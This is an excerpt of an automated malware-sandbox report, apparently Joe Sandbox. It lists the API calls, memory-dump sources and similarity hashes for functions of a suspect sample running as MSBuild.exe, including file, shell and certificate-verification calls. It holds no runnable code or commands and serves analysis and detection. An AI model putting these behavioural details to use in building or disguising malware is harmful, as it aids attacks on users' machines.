                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 0041CBC9
                                                                                                                                                                                                                        • Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
                                                                                                                                                                                                                        • Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
                                                                                                                                                                                                                        • Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 0041CC06
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: malloc$lstrcpylstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2974738957-0
                                                                                                                                                                                                                      • Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                                                                                                                                                      • Instruction ID: ee4a01d13f6e4d683757beabffaaf009a5c9ff74aa08d02828624340765fdc95
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FBF0F0766482119BC7206F66EC8199BBB94EB447A0F054027EE08DB341EA38DC8083E8
                                                                                                                                                                                                                      Function 004184AE Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                                                                                                                                                      • Instruction ID: 897ff34fa84f0db00a67010516d6b662afcd179cf6ab32d5fb27a0f78a31b5bc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34516031901201BBCE717BEE854AAF6B6D69FA0318B14048FF814AA232DF2D8DC45E5D
                                                                                                                                                                                                                      Function 00407BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
                                                                                                                                                                                                                      • Instruction ID: 6bc4e95e4b4d41cd45bcf0090cf4f159da268bf51a5422b08fd3501f4d4963e9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01319E71D0C2149FDF16DF55D8808AEBBB1EF84354B20816BE411B7391D738AE41DB9A
                                                                                                                                                                                                                      Function 00411DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1699248803-0
                                                                                                                                                                                                                      • Opcode ID: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
                                                                                                                                                                                                                      • Instruction ID: 1ebf8f7d6142e25c21b1da41a8396f416a06ca8f5008f9c8fada1f01269fc293
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30F03AB1E0015DABDB15DF78DC909EEB7FDEB48204F0045BAB909D3281EA349F458B94
                                                                                                                                                                                                                      Function 00411D92 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                      • Opcode ID: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
                                                                                                                                                                                                                      • Instruction ID: 4d5d301e7642eb8bcabe02fa2709f808051272e3482dadb5ff4d38445e53d8c5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56D05E31A00138578B5097A9FC044DEBB49CB817B5B005263FA6D9A2F0C265AD9242D8
                                                                                                                                                                                                                      Function 00412541 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SHFileOperationA.SHELL32(?), ref: 00412577
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileOperation
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3080627654-0
                                                                                                                                                                                                                      • Opcode ID: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
                                                                                                                                                                                                                      • Instruction ID: ef242af97a818274634bdf18eaf41cd9f3ea813bb85b2b5ad444d7661f99d088
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CAE09AB0D0420E9FDF44EFE4D5152DDBAF8BF08308F40916AC115F3240E37442058BA9
                                                                                                                                                                                                                      Function 0041C32D Relevance: 1.3, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: malloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2803490479-0
                                                                                                                                                                                                                      • Opcode ID: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
                                                                                                                                                                                                                      • Instruction ID: f25db29369a0cc3c2a63bcf2525b0a85751bd4b2dcebbf23d4fd8c8c2b96b222
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3021F6742007148FC320DF6ED485996B7F1FF49324B18886EEA8A8B722C776E881CB55
                                                                                                                                                                                                                      Function 00407EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: malloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2803490479-0
                                                                                                                                                                                                                      • Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                                                                                                                      • Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55

                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                      Function 6C896C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C896CCC
                                                                                                                                                                                                                      • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C896D11
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(0000000C), ref: 6C896D26
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C896D35
                                                                                                                                                                                                                      • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C896D53
                                                                                                                                                                                                                      • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C896D73
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C896D80
                                                                                                                                                                                                                      • CertGetNameStringW.CRYPT32 ref: 6C896DC0
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000000), ref: 6C896DDC
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C896DEB
                                                                                                                                                                                                                      • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C896DFF
                                                                                                                                                                                                                      • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C896E10
                                                                                                                                                                                                                      • CryptMsgClose.CRYPT32(00000000), ref: 6C896E27
                                                                                                                                                                                                                      • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C896E34
                                                                                                                                                                                                                      • CreateFileW.KERNEL32 ref: 6C896EF9
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000000), ref: 6C896F7D
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C896F8C
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C89709D
                                                                                                                                                                                                                      • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C897103
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C897153
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6C897176
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C897209
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C89723A
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C89726B
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C89729C
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8972DC
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C89730D
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C8973C2
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8973F3
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8973FF
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C897406
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C89740D
                                                                                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C89741A
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6C89755A
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C897568
                                                                                                                                                                                                                      • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C897585
                                                                                                                                                                                                                      • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C897598
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C8975AC
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                                                                                      • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                                                                                      • API String ID: 3256780453-3980470659
                                                                                                                                                                                                                      • Opcode ID: c74df5f83aedf661a255440b92eb50f9d7688dbd2e0f7eafd4cb301ebbc88955
                                                                                                                                                                                                                      • Instruction ID: 912e3b86540c071155e6b785887e6752f079b78e422bcbb4c9b4034b65532055
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c74df5f83aedf661a255440b92eb50f9d7688dbd2e0f7eafd4cb301ebbc88955
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6052A5B1A042149FEB31DF68CD44BEA77B8FB45708F1049ADE90997640DB70AB84CF91
                                                                                                                                                                                                                      Function 6C8CF070 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 412threadtimeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8CF09B
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C8A56EE,?,00000001), ref: 6C8A5B85
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: EnterCriticalSection.KERNEL32(6C90F688,?,?,?,6C8A56EE,?,00000001), ref: 6C8A5B90
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: LeaveCriticalSection.KERNEL32(6C90F688,?,?,?,6C8A56EE,?,00000001), ref: 6C8A5BD8
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: GetTickCount64.KERNEL32 ref: 6C8A5BE4
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C8CF0AC
                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: GetTickCount64.KERNEL32 ref: 6C8A5D40
                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: EnterCriticalSection.KERNEL32(6C90F688), ref: 6C8A5D67
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C8CF0BE
